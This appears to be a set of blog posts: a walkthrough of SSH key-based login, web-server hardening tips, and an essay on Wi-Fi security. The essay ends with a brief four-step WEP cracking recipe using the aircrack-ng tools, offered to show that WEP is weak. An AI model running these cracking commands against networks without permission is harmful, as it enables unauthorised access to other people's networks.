Key Based Authorization with SSH

Using remote shells is all time favourite but remembering those many passwords is a pain so here are the steps to login using SSH without putting a password :)

 

1. Create a public ssh key, if you haven’t one already. Look at ~/.ssh. If you see a file named id_dsa.pub then you obviously already have a public key. If not, simply create one.

ssh-keygen -t dsa should do the trick. Please note that there are other types of keys, e.g. RSA instead of DSA.

2. Make sure your .ssh dir is not publically writable

    # chmod 700 ~/.ssh

3. Get your public ssh key on the server you want to login automatically.
   
    #scp ~/.ssh/id_dsa.pub remoteuser@example.com

4. Append the contents of your public key to the ~/.ssh/authorized_keys and remove it.

Important: This must be done on the server you just copied your public key to. Otherwise you wouldn’t have had to copy it on your server. Simply issue something like

 

    # cat id_dsa.pub >> .ssh/authorized_keys while at your home directory.

 

5. Instead of steps 3 and 4, you can issue something like this:
   
    # cat ~/.ssh/id_dsa.pub | ssh -l remoteuser remoteserver.com 'cat >> ~/.ssh/authorized_keys'

   6. Remove your public key from the home directory on the server.

   7. And you are in

    # ssh -l remoteuser example.com
        or
    # ssh remoteuser@example.com

 

 without getting asked for a password.

Tips by an Admin-Developer

WebApps we have been developing since long we code with utmost attention, we code securely. Here are certain tips which might prevent us from a few attacks, they cannot save us completely, if they could why will be need security experts

  • Always create an index.html or index.php in each directory which is publicly accessible. We generally create folders like config, includes etc but dont create an index file in these due to which a Directory listing is shown which shows all files under the directory, so make a habit to create index.html leave it blank no probs or i would suggest that write a redirecting script in it so that if by chance a normal user goes to the directory he is redirected without seeing any of your files. Hey even Wordpress Drupal Joomla subdirectories should be checked they dont contain index.html as a result u can view http://<yourblog>/wp-content/plugins easily if its a wordpress go go and create index.html there
  • Dont keep backups on the live server i.e on publicly accessible folders.
  • Turn Server Signature Off if you can do generally in shared hosting you cant do this.
  • Create a connector file to store db name and password do not put these in each of your files.
  • Dont make unnecessary directories on web servers.
  • Keep the database and files separately.

Enjoy

[ad#460]

Wi-fi Security

Desclaimer:  The views expressed here are of the author alone, you may agree or disagree on any of them, code/commands given in the posts worked fine for the author please use them on your own risks they may damage your system.

I am in Pune since more than a year now have attended countless conferences, un-conferences, camps and what not, learnt a lot and atleast i am able to blog, in almost every event security is one of the leading topics is it that big, oh YES !!!, i would like to quote Rohit's statement "Click one centimetre below then what you use to click you would be much more secure".


With regards to Wi-fi i have heard many speakers discouraging the use of Open and WEP type of connection for home as well as corporate use, i truly agree after seeing the WEP crack in Club Hack 2008 i have also included the steps to crack WEP in this post later.

WPA2/802.1x hopefully is the most secure type of connection available today, but for how much time nobody  can comment, it would be cracked that is for sure but currently its the best.

We have seen incidences where in an attacker used an open wifi and send some of the threatening emails, we have also seen occasion when the attacker have stolen crucial data, the problem i see is lack of awareness among the users and the desire to use PLUG n PLAY devices the problem with PLUG n PLAY is you get something configured which is very generic and a common man don't dare to change it i.e don't dare to "click one centimetre below"

Personally i don't believe in PLUG n PLAY devices if i use them them i always manually configure it but its not the case with the normal public how can we ensure security to them when The Engineer from ISP comes and configures  AP in Open Mode? The need is to train our support persons on this. Recently i read an article saying that Cops in Mumbai would help users ensure that there Wifi is secure this is a very welcome step but when will this happen in other cities, when will the government be able to issue a check-list for a generic as well as for the corporate stating if you have done this a,b,c then you have done your part, i trust you.


I strongly believe that the person coming to your home for Internet Connection should configure your AP with WPA2 enabled and discourage using Open/WEP connection, the case is just reverse here hopefully this would improve very soon :)


Recommendations:

  • Never use an Open/WEP Connection
  • Never user Connection such as "Public Free Wi-fi" they may be dangerous
  • Always use WPA or WPA2 enabled connection
  • Home users should turn off AP when not in use
  • Atleast change the router password once a month, dont use admin admin please.
  • Change the default setting of your Access Point
  • Limit the DHCP allocation, recommended is bind with MAC if you have a few machines to use.
  • Always keep a log


Cracking a WEP password

Step 0 ) Use Backtrack with a supported wifi card
Step 1 ) airmon-ng start eth0
Step 2 ) airodump-ng -w capture -c 6 ath0
Step 3 ) aireplay-ng –arpreplay -b 00:11:22:33:44:55 -h 66:77:88:99:00:AA eth0
Step 4 ) aircrack-ng capture-01.cap


Detailed Guide available at http://mtaram.wordpress.com/2008/12/25/cracking-wep-in-4-steps use this at your own risk, the intention is not to teach any kind of hacking but to show that WEP is very weak.